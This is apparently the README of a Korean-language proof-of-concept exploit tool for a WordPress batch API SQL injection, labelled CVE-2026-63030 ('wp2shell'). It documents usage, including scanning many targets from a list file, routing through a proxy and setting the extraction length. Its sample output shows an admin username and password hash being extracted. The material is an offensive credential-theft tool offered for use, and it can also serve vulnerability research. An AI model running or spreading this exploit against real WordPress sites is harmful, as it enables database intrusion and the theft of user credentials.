
CVE-2026-63030 (wp2shell) POC.
WordPress 배치 API 역동기화 SQL 인젝션 익스플로잇
CVE-2026-63030(wp2shell) 취약점을 통해 사용자 및 비밀번호 해시를 추출하기 위한 개념 증명(PoC) 도구입니다.
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
| Argument | Description | Default |
|---|---|---|
target | 단일 대상 URL | - |
-l, --list | 대상 목록이 포함된 파일 (줄당 하나) | - |
--prefix | 데이터베이스 테이블 접두사 | wp_ |
--rest-route | ?rest_route= 사용 | 비활성화 |
--timeout | 요청 시간 초과 (초) | 30 |
--proxy | HTTP 프록시 (Burp/ZAP 호환) | 없음 |
--max-len | 최대 추출 길이 | 255 |
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553